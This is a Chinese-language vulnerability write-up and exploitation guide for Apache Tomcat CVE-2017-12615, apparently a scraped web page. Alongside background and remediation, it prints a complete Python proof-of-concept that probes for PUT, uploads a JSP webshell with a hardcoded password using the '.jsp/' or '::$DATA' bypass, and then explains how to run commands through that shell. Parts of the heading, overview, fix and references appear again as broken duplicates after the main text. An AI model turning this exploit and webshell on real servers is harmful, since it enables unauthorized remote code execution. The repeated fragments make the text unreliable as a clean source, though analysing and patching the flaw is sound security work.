Apache Tomcat CVE-2017-12615 远程代码执行漏洞分析与利用指南<\/h1>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2017-12615
漏洞类型<\/strong>: 远程代码执行
影响范围<\/strong>: Apache Tomcat 7.0.0 - 7.0.81
严重程度<\/strong>: 高危
披露日期<\/strong>: 2017年9月19日<\/p>

漏洞描述<\/h2>
当Tomcat运行在Windows主机上且启用了HTTP PUT请求方法时，攻击者可以通过构造特殊的请求向服务器上传包含任意代码的JSP文件，从而导致任意代码执行。<\/p>
漏洞原理<\/h2>
该漏洞的核心在于Tomcat对PUT请求处理不当，特别是在Windows环境下：<\/p>

当readonly<\/code>参数被设置为false<\/code>时，Tomcat允许通过PUT方法上传文件<\/li>
攻击者可以利用Windows文件系统特性绕过安全限制：使用\/<\/code>结尾的URL（如test.jsp\/<\/code>）绕过JSP文件检测<\/li> 或者使用NTFS备用数据流（如test.jsp::$DATA<\/code>）<\/li> <\/ul> <\/li> <\/ol> 环境搭建<\/h2> 受影响版本安装<\/h3> 下载Tomcat 7.0.81版本<\/li> 按照默认设置完成安装<\/li> <\/ol> 漏洞环境配置<\/h3> 定位Tomcat配置文件：conf\/web.xml<\/code><\/li> 找到DefaultServlet<\/code>配置部分<\/li> 修改readonly<\/code>参数为false<\/code>：<\/li> <\/ol> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>false<\/param-value><\/span> <\/span><\/span><\/init-param><\/span> <\/span><\/span><\/code><\/pre> 重启Tomcat服务使配置生效<\/li> <\/ol> 漏洞利用<\/h2> 利用前提条件<\/h3> 目标Tomcat版本在7.0.0-7.0.81范围内<\/li> HTTP PUT方法已启用<\/li> 目标系统为Windows<\/li> <\/ol> 利用步骤<\/h3> 检测PUT方法是否启用<\/strong>：<\/p> 发送OPTIONS请求检查Allow<\/code>头是否包含PUT方法<\/li> <\/ul> <\/li> 上传恶意JSP文件<\/strong>：<\/p> 使用PUT方法上传包含恶意代码的JSP文件<\/li> 利用Windows文件系统特性绕过限制<\/li> <\/ul> <\/li> <\/ol> 利用代码(POC)<\/h3> #! -*- coding:utf-8 -*-<\/span> <\/span><\/span>import<\/span> httplib <\/span><\/span>import<\/span> sys <\/span><\/span>import<\/span> time <\/span><\/span> <\/span><\/span>body =<\/span> '''<%@ page language="java" import="java.util.*,java.io.*" pageEncoding="UTF-8"%><%!public static String excuteCmd(String c) {StringBuilder line = new StringBuilder();try {Process pro = Runtime.getRuntime().exec(c);BufferedReader buf = new BufferedReader(new InputStreamReader(pro.getInputStream()));String temp = null;while ((temp = buf.readLine()) != null) {line.append(temp +"<\/span>\\<\/span>n");}buf.close();} catch (Exception e) {line.append(e.getMessage());}return line.toString();}%><<\/span>%i<\/span>f("023".equals(request.getParameter("pwd"))&&!"".equals(request.getParameter("cmd"))){out.println("<pre>"+excuteCmd(request.getParameter("cmd"))+"<\/pre>");}else{out.println(":-)");}%>'''<\/span> <\/span><\/span> <\/span><\/span>try<\/span>: <\/span><\/span> conn =<\/span> httplib.<\/span>HTTPConnection(sys.<\/span>argv[1<\/span>]) <\/span><\/span> conn.<\/span>request(method=<\/span>'OPTIONS'<\/span>, url=<\/span>'\/ffffzz'<\/span>) <\/span><\/span> headers =<\/span> dict(conn.<\/span>getresponse().<\/span>getheaders()) <\/span><\/span> if<\/span> 'allow'<\/span> in<\/span> headers and<\/span> headers['allow'<\/span>].<\/span>find('PUT'<\/span>) ><\/span> 0<\/span>: <\/span><\/span> conn.<\/span>close() <\/span><\/span> conn =<\/span> httplib.<\/span>HTTPConnection(sys.<\/span>argv[1<\/span>]) <\/span><\/span> url =<\/span> "\/"<\/span> +<\/span> str(int(time.<\/span>time()))+<\/span>'.jsp\/'<\/span> <\/span><\/span> # 或者使用: url = "\/" + str(int(time.time()))+'.jsp::$DATA'<\/span> <\/span><\/span> conn.<\/span>request(method=<\/span>'PUT'<\/span>, url=<\/span>url, body=<\/span>body) <\/span><\/span> res =<\/span> conn.<\/span>getresponse() <\/span><\/span> if<\/span> res.<\/span>status ==<\/span> 201<\/span>: <\/span><\/span> print 'shell:'<\/span>, 'http:\/\/'<\/span> +<\/span> sys.<\/span>argv[1<\/span>] +<\/span> url[:-<\/span>1<\/span>] <\/span><\/span> elif<\/span> res.<\/span>status ==<\/span> 204<\/span>: <\/span><\/span> print 'file exists'<\/span> <\/span><\/span> else<\/span>: <\/span><\/span> print 'error'<\/span> <\/span><\/span> conn.<\/span>close() <\/span><\/span> else<\/span>: <\/span><\/span> print 'Server not vulnerable'<\/span> <\/span><\/span>except<\/span> Exception<\/span>,e: <\/span><\/span> print 'Error:'<\/span>, e <\/span><\/span><\/code><\/pre>利用过程<\/h3> 执行POC脚本：python poc.py <target_ip:port><\/code><\/li> 脚本会返回上传的JSP webshell地址<\/li> 访问webshell并执行命令：参数：pwd=023<\/code>（密码）<\/li> 参数：cmd=<command><\/code>（要执行的命令）<\/li> <\/ul> <\/li> <\/ol> 漏洞修复<\/h2> 临时解决方案<\/h3> 禁用PUT方法<\/strong>：修改conf\/web.xml<\/code>，确保readonly<\/code>参数设置为true<\/code><\/li> 或完全移除PUT方法支持<\/li> <\/ul> <\/li> <\/ol> <init-param><\/span> <\/span><\/span> <param-name><\/span>readonly<\/param-name><\/span> <\/span><\/span> <param-value><\/span>true<\/param-value><\/span> <\/span><\/span><\/init-param><\/span> <\/span><\/span><\/code><\/pre> 配置安全限制<\/strong>：在conf\/web.xml<\/code>中添加安全约束，限制HTTP方法<\/li> <\/ul> <\/li> <\/ol> 永久解决方案<\/h3> 升级到Tomcat 7.0.82或更高版本，该版本已完全修复此漏洞。<\/p> 补充说明<\/h2> 该漏洞在7.0.79版本中首次修复，但修复不完全，7.0.81版本仍受影响<\/li> 漏洞利用仅限于Windows系统，因为利用了Windows文件系统的特性<\/li> 在实际渗透测试中，应确保获得合法授权后再进行测试<\/li> <\/ol> 参考链接<\/h2> Apache Tomcat官方安全公告<\/li> CVE官方记录：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-12615<\/li> NVD漏洞详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-12615<\/li> <\/ul>

Apache Tomcat CVE-2017-12615 远程代码执行漏洞分析与利用指南<\/h1>

漏洞概述<\/h2> 漏洞编号<\/strong>: CVE-2017-12615 漏洞类型<\/strong>: 远程代码执行 影响范围<\/strong>: Apache Tomcat 7.0.0 - 7.0.81 严重程度<\/strong>: 高危 披露日期<\/strong>: 2017年9月19日<\/p>

环境搭建<\/h2>

漏洞利用<\/h2>

漏洞修复<\/h2>

永久解决方案<\/h3> 升级到Tomcat 7.0.82或更高版本，该版本已完全修复此漏洞。<\/p>

参考链接<\/h2> Apache Tomcat官方安全公告<\/li> CVE官方记录：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-12615<\/li> NVD漏洞详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-12615<\/li> <\/ul>

漏洞概述<\/h2>
漏洞编号<\/strong>: CVE-2017-12615
漏洞类型<\/strong>: 远程代码执行
影响范围<\/strong>: Apache Tomcat 7.0.0 - 7.0.81
严重程度<\/strong>: 高危
披露日期<\/strong>: 2017年9月19日<\/p>

永久解决方案<\/h3>
升级到Tomcat 7.0.82或更高版本，该版本已完全修复此漏洞。<\/p>

参考链接<\/h2>

Apache Tomcat官方安全公告<\/li>
CVE官方记录：https:\/\/cve.mitre.org\/cgi-bin\/cvename.cgi?name=CVE-2017-12615<\/li>
NVD漏洞详情：https:\/\/nvd.nist.gov\/vuln\/detail\/CVE-2017-12615<\/li> <\/ul>